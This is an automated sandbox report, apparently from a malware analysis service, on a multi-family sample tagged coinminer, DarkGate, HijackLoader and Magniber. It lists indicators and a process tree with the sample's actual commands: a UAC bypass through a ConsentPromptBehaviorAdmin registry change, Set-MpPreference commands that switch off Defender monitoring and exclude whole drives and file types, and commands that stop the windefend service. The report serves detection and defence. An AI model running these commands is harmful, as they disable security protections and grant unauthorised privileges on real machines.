Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 reg.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet reg.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz reg.exe -
Enumerates system info in registry 2 TTPs 12 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Kills process with WMI 11 IoCs
pid Process 2904 WMIC.exe 2476 WMIC.exe 2152 WMIC.exe 1900 WMIC.exe 3036 WMIC.exe 2352 WMIC.exe 1588 WMIC.exe 2908 WMIC.exe 912 WMIC.exe 1980 WMIC.exe 2336 WMIC.exe -
Kills process with taskkill 1 IoCs
pid Process 2192 taskkill.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 11 IoCs
pid Process 1636 PING.EXE 1728 PING.EXE 1864 PING.EXE 1044 PING.EXE 3044 PING.EXE 2856 PING.EXE 2600 PING.EXE 2112 PING.EXE 1252 PING.EXE 1156 PING.EXE 2932 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2764 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2904 powershell.exe 2904 powershell.exe 2904 powershell.exe 2660 powershell.exe 2660 powershell.exe 2660 powershell.exe 772 powershell.exe 772 powershell.exe 772 powershell.exe 1208 powershell.exe 2924 powershell.exe 2416 powershell.exe 2416 powershell.exe 2416 powershell.exe 848 powershell.exe 848 powershell.exe 848 powershell.exe 1340 powershell.exe 2240 powershell.exe 1992 powershell.exe 1916 powershell.exe 2516 powershell.exe 1588 powershell.exe 1556 powershell.exe 2780 powershell.exe 2876 powershell.exe 2884 powershell.exe 2480 powershell.exe 2872 powershell.exe 2628 powershell.exe 1504 powershell.exe 1944 powershell.exe 1696 powershell.exe 1236 powershell.exe 2984 powershell.exe 2236 powershell.exe 964 powershell.exe 2652 powershell.exe 2652 powershell.exe 2652 powershell.exe 1692 PowerShell.exe 1692 PowerShell.exe 1740 powershell.exe 1740 powershell.exe 1740 powershell.exe 2380 IntelSvc.exe 2060 IntelSvc.exe 2060 IntelSvc.exe 2060 IntelSvc.exe 2060 IntelSvc.exe 2060 IntelSvc.exe 2060 IntelSvc.exe 2060 IntelSvc.exe 2060 IntelSvc.exe 2060 IntelSvc.exe 2060 IntelSvc.exe 2060 IntelSvc.exe 2060 IntelSvc.exe 2060 IntelSvc.exe 2060 IntelSvc.exe 2060 IntelSvc.exe 2060 IntelSvc.exe 2060 IntelSvc.exe 2060 IntelSvc.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2904 powershell.exe Token: SeDebugPrivilege 2660 powershell.exe Token: SeDebugPrivilege 772 powershell.exe Token: SeDebugPrivilege 1208 powershell.exe Token: SeDebugPrivilege 2924 powershell.exe Token: SeDebugPrivilege 2416 powershell.exe Token: SeDebugPrivilege 848 powershell.exe Token: SeDebugPrivilege 1340 powershell.exe Token: SeDebugPrivilege 2240 powershell.exe Token: SeDebugPrivilege 1992 powershell.exe Token: SeDebugPrivilege 1916 powershell.exe Token: SeDebugPrivilege 2516 powershell.exe Token: SeDebugPrivilege 1588 powershell.exe Token: SeDebugPrivilege 1556 powershell.exe Token: SeDebugPrivilege 2780 powershell.exe Token: SeDebugPrivilege 2876 powershell.exe Token: SeDebugPrivilege 2884 powershell.exe Token: SeDebugPrivilege 2480 powershell.exe Token: SeDebugPrivilege 2872 powershell.exe Token: SeDebugPrivilege 2628 powershell.exe Token: SeDebugPrivilege 1504 powershell.exe Token: SeDebugPrivilege 1944 powershell.exe Token: SeDebugPrivilege 1696 powershell.exe Token: SeDebugPrivilege 1236 powershell.exe Token: SeDebugPrivilege 2984 powershell.exe Token: SeDebugPrivilege 2236 powershell.exe Token: SeDebugPrivilege 964 powershell.exe Token: SeTakeOwnershipPrivilege 2576 takeown.exe Token: SeDebugPrivilege 2192 taskkill.exe Token: SeIncreaseQuotaPrivilege 2152 WMIC.exe Token: SeSecurityPrivilege 2152 WMIC.exe Token: SeTakeOwnershipPrivilege 2152 WMIC.exe Token: SeLoadDriverPrivilege 2152 WMIC.exe Token: SeSystemProfilePrivilege 2152 WMIC.exe Token: SeSystemtimePrivilege 2152 WMIC.exe Token: SeProfSingleProcessPrivilege 2152 WMIC.exe Token: SeIncBasePriorityPrivilege 2152 WMIC.exe Token: SeCreatePagefilePrivilege 2152 WMIC.exe Token: SeBackupPrivilege 2152 WMIC.exe Token: SeRestorePrivilege 2152 WMIC.exe Token: SeShutdownPrivilege 2152 WMIC.exe Token: SeDebugPrivilege 2152 WMIC.exe Token: SeSystemEnvironmentPrivilege 2152 WMIC.exe Token: SeRemoteShutdownPrivilege 2152 WMIC.exe Token: SeUndockPrivilege 2152 WMIC.exe Token: SeManageVolumePrivilege 2152 WMIC.exe Token: 33 2152 WMIC.exe Token: 34 2152 WMIC.exe Token: 35 2152 WMIC.exe Token: SeIncreaseQuotaPrivilege 2152 WMIC.exe Token: SeSecurityPrivilege 2152 WMIC.exe Token: SeTakeOwnershipPrivilege 2152 WMIC.exe Token: SeLoadDriverPrivilege 2152 WMIC.exe Token: SeSystemProfilePrivilege 2152 WMIC.exe Token: SeSystemtimePrivilege 2152 WMIC.exe Token: SeProfSingleProcessPrivilege 2152 WMIC.exe Token: SeIncBasePriorityPrivilege 2152 WMIC.exe Token: SeCreatePagefilePrivilege 2152 WMIC.exe Token: SeBackupPrivilege 2152 WMIC.exe Token: SeRestorePrivilege 2152 WMIC.exe Token: SeShutdownPrivilege 2152 WMIC.exe Token: SeDebugPrivilege 2152 WMIC.exe Token: SeSystemEnvironmentPrivilege 2152 WMIC.exe Token: SeRemoteShutdownPrivilege 2152 WMIC.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2060 IntelSvc.exe 2060 IntelSvc.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 2060 IntelSvc.exe 2060 IntelSvc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2396 wrote to memory of 2084 2396 2025-03-26_bac9ac1ac04e6924c24c39be9ffff843_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe 30 PID 2396 wrote to memory of 2084 2396 2025-03-26_bac9ac1ac04e6924c24c39be9ffff843_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe 30 PID 2396 wrote to memory of 2084 2396 2025-03-26_bac9ac1ac04e6924c24c39be9ffff843_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe 30 PID 2396 wrote to memory of 2084 2396 2025-03-26_bac9ac1ac04e6924c24c39be9ffff843_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe 30 PID 2084 wrote to memory of 2316 2084 cmd.exe 32 PID 2084 wrote to memory of 2316 2084 cmd.exe 32 PID 2084 wrote to memory of 2316 2084 cmd.exe 32 PID 2084 wrote to memory of 2316 2084 cmd.exe 32 PID 2316 wrote to memory of 2740 2316 cmd.exe 34 PID 2316 wrote to memory of 2740 2316 cmd.exe 34 PID 2316 wrote to memory of 2740 2316 cmd.exe 34 PID 2316 wrote to memory of 2740 2316 cmd.exe 34 PID 2316 wrote to memory of 2744 2316 cmd.exe 35 PID 2316 wrote to memory of 2744 2316 cmd.exe 35 PID 2316 wrote to memory of 2744 2316 cmd.exe 35 PID 2316 wrote to memory of 2744 2316 cmd.exe 35 PID 2740 wrote to memory of 3012 2740 wscript.exe 36 PID 2740 wrote to memory of 3012 2740 wscript.exe 36 PID 2740 wrote to memory of 3012 2740 wscript.exe 36 PID 2740 wrote to memory of 3012 2740 wscript.exe 36 PID 2316 wrote to memory of 2904 2316 cmd.exe 38 PID 2316 wrote to memory of 2904 2316 cmd.exe 38 PID 2316 wrote to memory of 2904 2316 cmd.exe 38 PID 2316 wrote to memory of 2904 2316 cmd.exe 38 PID 2904 wrote to memory of 2952 2904 powershell.exe 39 PID 2904 wrote to memory of 2952 2904 powershell.exe 39 PID 2904 wrote to memory of 2952 2904 powershell.exe 39 PID 2904 wrote to memory of 2952 2904 powershell.exe 39 PID 2952 wrote to memory of 2708 2952 cmd.exe 41 PID 2952 wrote to memory of 2708 2952 cmd.exe 41 PID 2952 wrote to memory of 2708 2952 cmd.exe 41 PID 2952 wrote to memory of 2708 2952 cmd.exe 41 PID 2952 wrote to memory of 1724 2952 cmd.exe 42 PID 2952 wrote to memory of 1724 2952 cmd.exe 42 PID 2952 wrote to memory of 1724 2952 cmd.exe 42 PID 2952 wrote to memory of 1724 2952 cmd.exe 42 PID 2952 wrote to memory of 2600 2952 cmd.exe 43 PID 2952 wrote to memory of 2600 2952 cmd.exe 43 PID 2952 wrote to memory of 2600 2952 cmd.exe 43 PID 2952 wrote to memory of 2600 2952 cmd.exe 43 PID 2952 wrote to memory of 2608 2952 cmd.exe 44 PID 2952 wrote to memory of 2608 2952 cmd.exe 44 PID 2952 wrote to memory of 2608 2952 cmd.exe 44 PID 2952 wrote to memory of 2608 2952 cmd.exe 44 PID 2952 wrote to memory of 2660 2952 cmd.exe 45 PID 2952 wrote to memory of 2660 2952 cmd.exe 45 PID 2952 wrote to memory of 2660 2952 cmd.exe 45 PID 2952 wrote to memory of 2660 2952 cmd.exe 45 PID 2660 wrote to memory of 672 2660 powershell.exe 46 PID 2660 wrote to memory of 672 2660 powershell.exe 46 PID 2660 wrote to memory of 672 2660 powershell.exe 46 PID 2660 wrote to memory of 672 2660 powershell.exe 46 PID 2952 wrote to memory of 1636 2952 cmd.exe 48 PID 2952 wrote to memory of 1636 2952 cmd.exe 48 PID 2952 wrote to memory of 1636 2952 cmd.exe 48 PID 2952 wrote to memory of 1636 2952 cmd.exe 48 PID 672 wrote to memory of 772 672 cmd.exe 49 PID 672 wrote to memory of 772 672 cmd.exe 49 PID 672 wrote to memory of 772 672 cmd.exe 49 PID 672 wrote to memory of 772 672 cmd.exe 49 PID 772 wrote to memory of 2028 772 powershell.exe 50 PID 772 wrote to memory of 2028 772 powershell.exe 50 PID 772 wrote to memory of 2028 772 powershell.exe 50 PID 772 wrote to memory of 2028 772 powershell.exe 50 -
Views/modifies file attributes 1 TTPs 22 IoCs
pid Process 676 attrib.exe 1992 attrib.exe 1536 attrib.exe 592 attrib.exe 2568 attrib.exe 2364 attrib.exe 1640 attrib.exe 2272 attrib.exe 1932 attrib.exe 2676 attrib.exe 1340 attrib.exe 2868 attrib.exe 2620 attrib.exe 2224 attrib.exe 2692 attrib.exe 968 attrib.exe 2116 attrib.exe 704 attrib.exe 2848 attrib.exe 2616 attrib.exe 2460 attrib.exe 2080 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-26_bac9ac1ac04e6924c24c39be9ffff843_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-26_bac9ac1ac04e6924c24c39be9ffff843_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Start.cmd" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Start.cmd"3⤵
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\SysWOW64\wscript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\testvb1.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Public\ & copy /v /b /y C:\Users\Public\testvb1.vbs C:\Users\Public\testvb2.vbs5⤵PID:3012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Temp\Start.cmd"4⤵PID:2744
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Start2.cmd' -windowstyle hidden"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Start2.cmd" "5⤵
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Temp\Start2.cmd"6⤵PID:2708
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin"6⤵
- System Location Discovery: System Language Discovery
PID:1724
-
-
C:\Windows\SysWOW64\find.exeC:\Windows\System32\find.exe "0x0"6⤵PID:2600
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe query "HKCU\Software\Microsoft\Windows"6⤵
- System Location Discovery: System Language Discovery
PID:2608
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\uac.cmd' -windowstyle hidden"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\uac.cmd" "7⤵
- Suspicious use of WriteProcessMemory
PID:672 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe" -Command "Start-Process cmd -ArgumentList '/c "C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe" Set-Itemproperty -Path REGISTRY::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0' -Verb RunAs -Wait -windowstyle hidden"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-Itemproperty -Path REGISTRY::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 09⤵PID:2028
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-Itemproperty -Path REGISTRY::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 010⤵
- UAC bypass
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1208
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEC:\Windows\System32\ping.exe 192.168.1.1 -n 36⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1636
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin"6⤵PID:2972
-
-
C:\Windows\SysWOW64\find.exeC:\Windows\System32\find.exe "0x0"6⤵PID:2684
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "& {Get-Content -Path "'C:\Users\Admin\AppData\Local\Temp\NhStart3.cmd'" | Out-File -FilePath "'C:\Users\Admin\AppData\Local\Temp\Start3.cmd'" -Encoding ascii}" -Wait6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Start3.cmd' -verb runas -windowstyle hidden"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Start3.cmd"7⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:2348 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\stwinvr.cmd' -verb runas -windowstyle hidden"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:848 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\stwinvr.cmd"9⤵PID:1532
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-MpPreference -ExclusionExtension bat10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2240
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command Set-MpPreference -MAPSReporting Disable10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2516
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command Set-MpPreference -SubmitSamplesConsent NeverSend10⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -PUAProtection disable10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -ScanScheduleDay "8"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2884
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -HighThreatDefaultAction "9"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -ModerateThreatDefaultAction "9"10⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1944
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -LowThreatDefaultAction "9"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -SevereThreatDefaultAction "9"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2984
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:964
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1340
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\SysWOW64\en"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1916
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Public"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1556
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\L2cache"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2876
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\ProgramData"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2480
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Tfile"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Tweaker"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1504
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-MpPreference -ExclusionExtension cmd8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1236
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-MpPreference -ExclusionExtension exe8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2236
-
-
C:\Windows\SysWOW64\net.exeC:\Windows\System32\NET.exe stop windefend8⤵PID:652
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop windefend9⤵PID:2192
-
-
-
C:\Windows\SysWOW64\sc.exeC:\Windows\System32\SC.exe config windefend start=disabled8⤵
- Launches sc.exe
PID:2976
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f /reg:648⤵
- System Location Discovery: System Language Discovery
PID:1232
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f8⤵PID:2488
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v TeamViewer /f8⤵PID:2892
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v TeamViewer /f8⤵PID:1388
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f8⤵
- System Location Discovery: System Language Discovery
PID:676
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /f8⤵PID:1336
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d "0" /f8⤵PID:960
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d "1" /f /reg:648⤵PID:1928
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Windows" /v NoInteractiveServices /t REG_DWORD /d "1" /f8⤵
- System Location Discovery: System Language Discovery
PID:848
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d "1" /f8⤵
- System Location Discovery: System Language Discovery
PID:628
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v "DontShowUI" /t REG_DWORD /d "1" /f8⤵PID:1936
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f /reg:648⤵PID:2180
-
-
